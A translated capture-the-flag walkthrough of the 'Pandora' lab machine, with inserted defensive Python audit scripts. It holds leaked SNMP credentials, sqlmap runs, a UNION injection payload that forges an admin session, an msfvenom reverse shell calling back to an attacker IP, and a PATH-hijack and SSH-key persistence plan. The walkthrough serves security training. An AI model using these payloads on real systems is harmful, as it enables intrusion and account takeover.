🧟无风祭酒🧟
A small doctor heals people😈, a great doctor heals the world
☣️Courtesy first, force second☢️
👻 Notice 👻
🦧This article collects what the author has been studying; the intent is to consolidate and shore up the basics by writing the knowledge out. If there are mistakes, I ask the big brothers to forgive me.
WeChat public account: acesec
🦾nmap scan
🪶Let's welcome the nmap vanguard, the big shot, onto the stage🛵:
(nmap: "Kid! Step aside and watch big brother do his thing~")
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sS -p- -sC -sV -A --min-rate=5000 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 02:01 EDT
Nmap scan report for 10.10.11.136
Host is up (0.35s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/8%OT=22%CT=1%CU=34068%PV=Y%DS=2%DC=T%G=Y%TM=624FD00D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=2%ISR=10C%TI=Z%CI=Z%TS=C)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=C)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3
OS:=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 357.00 ms 10.10.14.1
2 357.08 ms 10.10.11.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.57 seconds
🦿nmap turned up two ports, 22 and 80. Same old routine, let's go! Have a look at our old friend, port 80.
🦿Turned the place upside down: nothing!!!
😈: Brother nmap, any more tricks?
nmap: emm~ got one💡, let me hit it with a heavier dose of poison --> UDP scan
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sU -top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 02:31 EDT
Nmap scan report for 10.10.11.136
Host is up (0.34s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 26.13 seconds
🦿Port 161, the SNMP service (heh heh! an opening~🤤🤤)
🦾snmpwalk
🦿Try connecting to it with snmpwalk
┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 2c -c public 10.10.11.136
-v: the SNMP version to use: 1, 2c or 3
-c: the community string (SNMP's "password") for the device; public is the common default read-only community
🐷: Brothers, wake up, open your eyes and listen to me: the walk returns a lot of information, but don't just sit there sipping cola🥤 and waiting
🦿In the walk output we find this line:
1.25.4.2.1.5.855 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
👓Guess?! Who does that look like~ It looks an awful lot like an account: daniel
password: HotelBabylon23
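As an added illustration, not part of the original post: the line quoted above is a row of the hrSWRunParameters column of HOST-RESOURCES-MIB (OID .1.3.6.1.2.1.25.4.2.1.5), which hands the full argument string of every running process to anyone who knows the read community. The Python script below, written for this edit, scans snmpwalk output for those rows and flags argument strings that carry a credential-style flag, which is how an administrator can audit their own SNMP exposure before someone else does. The sample walk lines are constructed; only the host_check line mirrors the one on the page, and the list of credential flags is an assumption to extend as needed.

```python
import re
import sys

# Constructed sample snmpwalk output (not the post's own output; the post shows a single,
# abbreviated hrSWRunParameters line). OID .1.3.6.1.2.1.25.4.2.1.5 is
# HOST-RESOURCES-MIB::hrSWRunParameters: the argument string of each running process,
# indexed by PID. Both the numeric and the MIB-resolved spelling are included.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.4.855 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.610 = STRING: "-f /etc/snmp/snmpd.conf -Lsd"
iso.3.6.1.2.1.25.4.2.1.5.855 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.901 = STRING: "--password=S3cretValue --host db.internal"
"""

# Matches either the numeric or the MIB-resolved form of an hrSWRunParameters row.
_RUN_PARAMS = re.compile(
    r'^(?:\S*?25\.4\.2\.1\.5|HOST-RESOURCES-MIB::hrSWRunParameters)\.(\d+)'
    r'\s*=\s*STRING:\s*"(.*)"\s*$'
)
# Flags that conventionally carry a secret as the next token or after '='
# (assumed list; extend for the tools in your environment).
_CRED_FLAG = re.compile(r'(?:^|\s)(--password|--pass|-pw|-p|-P)(?:=|\s+)(\S+)')


def mask(secret):
    """Keep a 3-character prefix so a finding can still be matched to the real value."""
    return secret[:3] + "*" * max(len(secret) - 3, 0)


def find_exposed_credentials(walk_output):
    """Return one finding per credential-looking flag found in any process's argv."""
    findings = []
    for line in walk_output.splitlines():
        m = _RUN_PARAMS.match(line.strip())
        if not m:
            continue
        pid, args = int(m.group(1)), m.group(2)
        for flag, value in _CRED_FLAG.findall(args):
            findings.append({
                "pid": pid,
                "flag": flag,
                "value_masked": mask(value.strip("'\"")),
                "argv": args,
            })
    return findings


if __name__ == "__main__":
    # Pipe real snmpwalk output in, or run without input to audit the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_WALK
    for f in find_exposed_credentials(text):
        print(f"pid {f['pid']}: {f['flag']} {f['value_masked']}  <- {f['argv']}")
```

Run it as `snmpwalk -v 2c -c public <host> .1.3.6.1.2.1.25.4.2.1.5 | python3 snmp_argv_audit.py` (file name hypothetical). Two fixes apply to what the page found: the host_check job should read its password from a file or the environment instead of argv, so it never shows up in the process table at all; and snmpd's read community should be restricted to the system subtree rather than exposing the process table, with a guessable v2c community replaced by v3 with authentication.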
🦾SSH login
🦿Combined with port 22 found earlier, try logging in over SSH
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh daniel@10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 8 Apr 08:46:26 UTC 2022
System load: 0.0 Processes: 227
Usage of /: 63.0% of 4.87GB Users logged in: 1
Memory usage: 16% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 8 08:04:54 2022 from 10.10.14.11
daniel@pandora:~$
🗽Successfully inside enemy territory.
🦿Sweep the outskirts of the enemy territory:
daniel@pandora:~$ ls -la
total 36
drwxr-xr-x 6 daniel daniel 4096 Apr 8 07:38 .
drwxr-xr-x 4 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 daniel daniel 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 daniel daniel 3771 Feb 25 2020 .bashrc
drwx------ 2 daniel daniel 4096 Apr 8 07:29 .cache
drwx------ 2 daniel daniel 4096 Apr 8 07:33 .gnupg
drwxrwxr-x 3 daniel daniel 4096 Apr 8 07:38 .local
-rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile
drwx------ 2 daniel daniel 4096 Dec 7 14:32 .ssh
daniel@pandora:~$ pwd
/home/daniel
daniel@pandora:~$ cd ..
daniel@pandora:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 7 14:32 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 6 daniel daniel 4096 Apr 8 07:38 daniel
drwxr-xr-x 2 matt matt 4096 Dec 7 15:00 matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec 7 15:00 .
drwxr-xr-x 4 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile
-rw-r----- 1 root matt 33 Apr 8 05:52 user.txt
🦿The spoils: user.txt heh heh~🤤😍
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
🦿No permission!!! Then let's work hard on privilege escalation!
🦿Check the listening ports:
daniel@pandora:/home/matt$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 10.10.11.136:22 10.10.14.11:44696 ESTABLISHED keepalive (3861.38/0/0)
tcp 0 1 10.10.11.136:48544 1.1.1.1:53 SYN_SENT on (7.27/3/0)
tcp 0 0 10.10.11.136:22 10.10.14.11:44644 ESTABLISHED keepalive (1723.91/0/0)
tcp 0 216 10.10.11.136:22 10.10.14.9:52190 ESTABLISHED on (0.57/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:161 0.0.0.0:* off (0.00/0/0)
udp 0 0 127.0.0.1:39337 127.0.0.53:53 ESTABLISHED off (0.00/0/0)
udp6 0 0 ::1:161 :::* off (0.00/0/0)
🦿While rummaging around, found a site called pandora under /var/www
daniel@pandora:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 7 14:32 .
drwxr-xr-x 14 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 3 root root 4096 Dec 7 14:32 html
drwxr-xr-x 3 matt matt 4096 Dec 7 14:32 pandora
🦿Keep rummaging, and there's also the apache configuration:
daniel@pandora:/etc/apache2/sites-available$ ls -la
total 24
drwxr-xr-x 2 root root 4096 Dec 7 12:59 .
drwxr-xr-x 8 root root 4096 Dec 7 12:59 ..
-rw-r--r-- 1 root root 1332 Apr 13 2020 000-default.conf
-rw-r--r-- 1 root root 6338 Apr 13 2020 default-ssl.conf
-rw-r--r-- 1 root root 315 Dec 3 12:56 pandora.conf
daniel@pandora:/etc/apache2/sites-available$ cat pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
Reading the config carefully: the pandora site is bound to localhost only, so it can only be reached from the box itself (and, per AssignUserID, it runs as user matt).
🦾SSH tunnel
🦿Use SSH port forwarding to get what we want. The SSH tunnel:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 11 Apr 05:43:49 UTC 2022
System load: 0.03 Processes: 225
Usage of /: 64.1% of 4.87GB Users logged in: 1
Memory usage: 9% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 11 05:37:47 2022 from 10.10.14.28
🦿Forward set up; visiting 127.0.0.1 in the browser now reaches the web service on the target's localhost
🦿Look closely at the page title: it's Pandora FMS, and the bottom of the page gives the version, v7.0NG.742_FIX_PERL2020
🦿Check https://www.cvedetails.com/ for known holes
🦿The injection point turns out to be the session_id parameter of pandora_console/include/chart_generator.php
🦾sqlmap
🦿One shot with sqlmap
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch   # test whether the URL is injectable; --batch never prompts and takes every default
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql --dbs   # tell sqlmap the backend is MySQL; enumerate all databases
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora --tables   # enumerate the tables of the pandora database
# only three tables relate to sessions; after testing them, tsessions_php is the one
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora -T tsessions_php --columns   # enumerate the table's columns
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data,last_active --dump   # dump the data
Database: pandora
Table: tsessions_php
[43 entries]
+----------------------------+-----------------------------------------------------+
| id_session | data |
+----------------------------+-----------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; |
| 0ahul7feb1l9db7ffp8d25sjba | NULL |
| 1um23if7s531kqf5da14kf5lvm | NULL |
| 20u1oic55kc43dvc3haongjstm | NULL |
| 2e25c62vc3odbppmg6pjbf9bum | NULL |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; |
| 3me2jjab4atfa5f8106iklh4fc | NULL |
| 4f51mju7kcuonuqor3876n8o02 | NULL |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; |
| 59qae699l0971h13qmbpqahlls | NULL |
| 5fihkihbip2jioll1a8mcsmp6j | NULL |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; |
| 81f3uet7p3esgiq02d4cjj48rc | NULL |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; |
| 8upeameujo9nhki3ps0fu32cgd | NULL |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; |
| a3a49kc938u7od6e6mlip1ej80 | NULL |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; |
| cojb6rgubs18ipb35b3f6hf0vp | NULL |
| d0carbrks2lvmb90ergj7jv6po | NULL |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; |
| fikt9p6i78no7aofn74rr71m85 | NULL |
| fqd96rcv4ecuqs409n5qsleufi | NULL |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
| gf40pukfdinc63nm5lkroidde6 | NULL |
| gktu0to59na3mnhbgfcv2tkhqv | id_usuario|s:6:"daniel"; |
| heasjj8c48ikjlvsf1uhonfesv | NULL |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; |
| i4in616e9cq1cacqvfdblmrc41 | NULL |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; |
| kp90bu1mlclbaenaljem590ik3 | NULL |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL |
| noqn8u3jj894l2r4jsjrvrpla8 | id_usuario|s:6:"daniel"; |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL |
| r097jr6k9s7k166vkvaj17na1u | NULL |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; |
+----------------------------+-----------------------------------------------------+
🦿From the dumped data I didn't get admin at all, so...... 🩴🩴🩴 out comes the slipper *#¥##%&*** sqlmap, how do you even do your job!🔞
🦾Build the POC
🦿Dreaming up a POC:
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 1,2,'id_usuario|s:5:"admin";' as data -- acesec
🦿Open the POC in the browser and you're in the admin console.
After visiting the POC you may need to visit http://127.0.0.1/pandora_console/ again.
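The forged session works because chart_generator.php pastes session_id straight into its SQL and then trusts whatever row comes back. The Python example below is added here and is not Pandora FMS code: it rebuilds a miniature tsessions_php in SQLite (the three-column layout id_session, last_active, data is assumed, matching the three values in the UNION), runs the page's payload through a concatenated query and through a parameterized one, and parses the PHP-serialized data column the way a login check would.

```python
import re
import sqlite3

# The post's forged-session payload, verbatim.
PAYLOAD = "a' UNION SELECT 1,2,'id_usuario|s:5:\"admin\";' as data -- acesec"


def make_db():
    """Constructed stand-in for the session table; rows copied from the dump above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tsessions_php (id_session TEXT PRIMARY KEY, last_active INTEGER, data TEXT)"
    )
    conn.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", [
        ("09vao3q1dikuoi1vhcvhcjjbc6", 1649400000, 'id_usuario|s:6:"daniel";'),
        ("0ahul7feb1l9db7ffp8d25sjba", 1649400001, None),
        ("g4e01qdgk36mfdh90hvcc54umq", 1649400002,
         'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;'),
    ])
    return conn


def lookup_session_vulnerable(conn, session_id):
    """Concatenates the request parameter into the SQL text: the defect being exploited."""
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           f"WHERE id_session = '{session_id}'")
    return conn.execute(sql).fetchone()


def lookup_session_safe(conn, session_id):
    """Same query with a bound parameter: the input is only ever compared as a value."""
    sql = "SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = ?"
    return conn.execute(sql, (session_id,)).fetchone()


# PHP session serialization: key|s:<len>:"<value>";
_ID_USUARIO = re.compile(r'id_usuario\|s:(\d+):"([^"]*)";')


def php_session_user(data):
    """Extract the user from the serialized session, rejecting a wrong declared length."""
    if not data:
        return None
    m = _ID_USUARIO.search(data)
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2)


if __name__ == "__main__":
    conn = make_db()
    row = lookup_session_vulnerable(conn, PAYLOAD)
    print("concatenated query returned:", row, "->", php_session_user(row[2]) if row else None)
    print("parameterized query returned:", lookup_session_safe(conn, PAYLOAD))
```

The concatenated lookup returns the attacker-supplied row, whose id_usuario says admin; the bound-parameter version compares the whole payload as a literal and returns nothing. Parameterizing the query is the fix for the injection itself. A second, independent check (the returned row's id_session must equal the supplied one) would make a forged row useless even if another injection turned up.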
🦿Look for an upload location:
🦾Build the POC (reverse shell)
🦿Bring in MSF, I want to have a baby with it... pah! I mean, generate a PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.28 LPORT=1235 -f raw > ace.php
🦿Upload ace.php
🫁Start msfconsole:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.14.28
LHOST => 10.10.14.28
msf6 exploit(multi/handler) > set LPORT 1235
LPORT => 1235
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.28:1235
[*] Sending stage (39282 bytes) to 10.10.11.136
[*] Meterpreter session 1 opened (10.10.14.28:1235 -> 10.10.11.136:45524 ) at 2022-04-11 04:37:58 -0400
meterpreter > shell
🪶Side note: if this errors out, the port may already be in use; 🔪 kill the process holding it:
netstat -anop
kill -9 <PID of the process on that port>
🦿Trigger the shell by visiting:
http://127.0.0.1/pandora_console/images/ace.php
🦿Session obtained:
meterpreter > shell
Process 13568 created.
Channel 0 created.
whoami
matt
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
pwd
/var/www/pandora/pandora_console/images
cd /home/matt
pwd
/home/matt
ls
user.txt
cat user.txt
e43427293c88afa40d19522f6b53f119
🦾Super invincible adorable root
🦿Escalate privileges to root
🦿Upgrade to an interactive shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
🦿Have a look at the files with the SUID bit set
matt@pandora:/$ find / -perm -u=s 2> /dev/null
find / -perm -u=s 2> /dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
One binary stands out: pandora_backup
🦿List the SUID files owned by root:
matt@pandora:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
🦿Running pandora_backup (here through sudo) errors out:
matt@pandora:/$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
🦿Let little brother cat dig in deeper:
matt@pandora:/$ cat /usr/bin/pandora_backup
cat /usr/bin/pandora_backup
(raw ELF output; only the readable strings buried in it are kept here)
/lib64/ld-linux-x86-64.so.2
puts setreuid system getuid geteuid __cxa_finalize __libc_start_main libc.so.6 GLIBC_2.2.5
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
GCC: (Debian 10.2.1-6) 10.2.1 20210110
backup.c
🦿The binary runs a tar command to back up the Pandora application files, and it invokes tar by its bare name rather than an absolute path, so the name is resolved through PATH at run time: a fake tar placed in a directory that comes earlier in PATH gets executed in its place, with the binary's elevated privileges.
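To see why that bare tar is the weak spot, here is an added audit script (written for this edit, not part of the post or of Pandora FMS). It reproduces what strings(1) does over a byte blob, then flags command-looking strings whose program is resolved through PATH, and notes whether system and a privilege-restoring call such as setreuid are both imported. The blob is constructed from the readable strings the cat output above showed, plus one absolute-path command for contrast; given a file argument it audits a real binary instead.

```python
import re
import string
import sys

# Constructed byte blob standing in for /usr/bin/pandora_backup. It reproduces the readable
# strings the post recovered with cat (imported symbols, messages, the tar command) plus one
# constructed absolute-path command for contrast; it is not the real binary.
FAKE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"puts\x00setreuid\x00system\x00getuid\x00geteuid\x00__libc_start_main\x00libc.so.6\x00"
    + b"\x00\x10\x90\x48\x00"
    + b"PandoraFMS Backup Utility\x00"
    + b"Now attempting to backup PandoraFMS client\x00"
    + b"tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\x00"
    + b"Backup failed!\x00Check your permissions!\x00Backup successful!\x00Terminating program!\x00"
    + b"/usr/bin/tar -cvf /tmp/contrast.tar.gz /var/www/pandora\x00"  # constructed contrast
    + b"GCC: (Debian 10.2.1-6) 10.2.1 20210110\x00"
)

# Printable ASCII minus control whitespace: what strings(1) treats as text.
_PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")


def extract_strings(blob, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    found, run = [], bytearray()
    for byte in blob:
        if byte in _PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


# A shell command whose program is a bare name (no '/') is resolved through PATH at run time.
_BARE_CMD = re.compile(r"^([a-z][a-z0-9_.+-]*)\s+(\S.*)$")


def find_unqualified_commands(strings_found):
    """Command-looking strings whose first word is a bare program name, not an absolute path."""
    hits = []
    for s in strings_found:
        m = _BARE_CMD.match(s)
        if not m:
            continue
        rest = m.group(2).split()
        # Heuristic: option flags or paths among the arguments mark a command, not a message.
        if any(tok.startswith("-") or "/" in tok for tok in rest):
            hits.append(s)
    return hits


def audit_suid_binary(blob):
    """Summarize the risky combination: system() plus a uid-changing call plus bare commands."""
    strs = extract_strings(blob)
    names = set(strs)
    return {
        "calls_system": "system" in names,
        "restores_privileges": bool(names & {"setreuid", "setuid", "setresuid", "seteuid"}),
        "unqualified_commands": find_unqualified_commands(strs),
    }


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else FAKE_BINARY
    for key, value in audit_suid_binary(blob).items():
        print(f"{key}: {value}")
```

A setuid program that calls system() runs the command through the shell with the caller's PATH and IFS, so a bare command name is resolved in directories the caller controls. The fixes, in order of preference: don't use system() in setuid code at all; use execve with an absolute path and a fixed environment; or at least set PATH to a fixed value before system(). Running this over the output of `find / -uid 0 -perm -4000 -type f` (the command the post uses above) keeps custom setuid helpers like this one from slipping by unnoticed.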
🦾The eve of Normandy: brewing the SSH potion
🦿Want to log in over SSH?! Of course, we haven't looted matt's password or SSH key yet. 😮💨 Life is unpredictable; you have to carry it all yourself, so generate a key pair
matt@pandora:/home/matt$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Created directory '/home/matt/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wpZH1lckSqXsYgZVfzUKLhYuXBEFTrA9wU7paeS23JY matt@pandora
The key's randomart image is:
+---[RSA 3072]----+
| .+XO+o.o..|
| ..BO++.o...|
| .+OB*.o.. |
| . =oOo. . |
| = S + . |
| . = + E |
| . |
| |
| |
+----[SHA256]-----+
🐷: just keep hitting Enter (can't stop the car now~)
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ ls
ls
id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
cat id_rsa.pub > authorized_keys
